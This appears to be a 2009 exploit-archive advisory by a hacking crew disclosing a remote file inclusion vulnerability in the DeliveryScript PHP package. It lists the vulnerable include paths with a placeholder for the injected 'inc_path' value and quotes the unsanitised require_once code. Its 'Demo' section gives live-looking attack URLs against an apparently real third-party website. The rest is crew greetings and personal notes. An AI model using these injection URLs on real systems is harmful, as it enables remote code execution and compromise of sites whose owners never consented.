|    |    |    | Today: 20-Sep-2019 |

DeliveryScript Multiple Remote File Include

November 7, 2009 | Posted in ExploitAlert

[+] Author : kaMtiEz (kamzcrew@yahoo.com)
[+] Homepage : http://www.indonesiancoder.com
[+] Date : October 30, 2009
[+] Location : INDONESIA - Jogja

######################################
[ Software Information ]

[+] Vendor : http://www.deliveryscript.com/
[+] Download : -
[+] version : v25 or lower
[+] Price : - Unlimited = $199
- Professional = $99
- Standard = $39
[+] Vulnerability : RFI
[+] Dork : Indonesian Coder Team & Kill-9 Crew
#####################################
[ Vulnerable File ]

http://127.0.0.1/[PATH]/ds-inc/inc.php?inc_path=[INDONESIANCODER]
http://127.0.0.1/[PATH]/ds-inc/functions.php?inc_path=[INDONESIANCODER]
http://127.0.0.1/[PATH]/ds-inc/setups.php?inc_path=[INDONESIANCODER]
######################################
[ PoC ]

[+] inc.php


require_once($inc_path . 'functions.php');
require_once($inc_path . 'setups.php');


[+] functions.php

require_once($inc_path . 'functions/admin/function.invalidate_admin.php');
require_once($inc_path . 'functions/admin/function.is_valid_admin.php');
require_once($inc_path . 'functions/admin/function.set_valid_admin.php');
require_once($inc_path . 'functions/sms/function.send_clickatell_sms.php');
require_once($inc_path . 'functions/util/function._decrypt.php');
require_once($inc_path . 'functions/util/function._encrypt.php');
require_once($inc_path . 'functions/util/function.filesize_format.php');
require_once($inc_path . 'functions/util/function.get_host.php');
require_once($inc_path . 'functions/util/function.get_uri.php');
require_once($inc_path . 'functions/util/function.get_user_ip.php');
require_once($inc_path . 'functions/function._array_unique.php');
require_once($inc_path . 'functions/function.block_link.php');
require_once($inc_path . 'functions/function.download_file_exists.php');
require_once($inc_path . 'functions/function.generate_auth.php');
require_once($inc_path . 'functions/function.get_product.php');
require_once($inc_path . 'functions/function.is_blocked.php');
require_once($inc_path . 'functions/function.is_valid_download_request.php');
require_once($inc_path . 'functions/function.is_valid_payment.php');
require_once($inc_path . 'functions/function.notify_idevaffiliate.php');
require_once($inc_path . 'functions/function.process_order.php');
require_once($inc_path . 'functions/function.product_exists.php');
require_once($inc_path . 'functions/function.resend_order_email.php');
require_once($inc_path . 'functions/function.returned_txn_id_exists.php');
require_once($inc_path . 'functions/function.sectostr.php');
require_once($inc_path . 'functions/function.send_echeck_delay_notice.php');
require_once($inc_path . 'functions/function.send_manual_process_notice.php');
require_once($inc_path . 'functions/function.send_order_email.php');
require_once($inc_path . 'functions/function.txn_id_exists.php');


[+] setups.php

require_once($inc_path . 'setups/setup.phpmailer.php');
require_once($inc_path . 'setups/setup.phpxml.php');

######################################
[ Demo ]

http://prkg.com/wallstreet/ds-inc/inc.php?inc_path=[kaMtiEz]
http://prkg.com/wallstreet/ds-inc/functions.php?inc_path=[kaMtiEz]
http://prkg.com/wallstreet/ds-inc/setups.php?inc_path=[kaMtiEz]
######################################
[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!
######################################
[ NOTE ]

[+] makasih buad babe and enyak ma ade .... muach ..
[+] AuraKasih ada apa dengan mu ???
[+] For M3NW5 Woi lu di tunggu Om Don Tukulesto tuh !! Malah ngilang ..
[+] For Don Tukulesto .. Nothing to say .. u are best !
[+] Buat Para IndonesianCoder dan kill-9 Member .. Tetap semangat !!!
[+] Malam Minggu jam setengah 8 .. Mau ngapel malah nemu Vulnerability .. wkwkkw

Taged in: deliveryscript, include, Multiple, Remote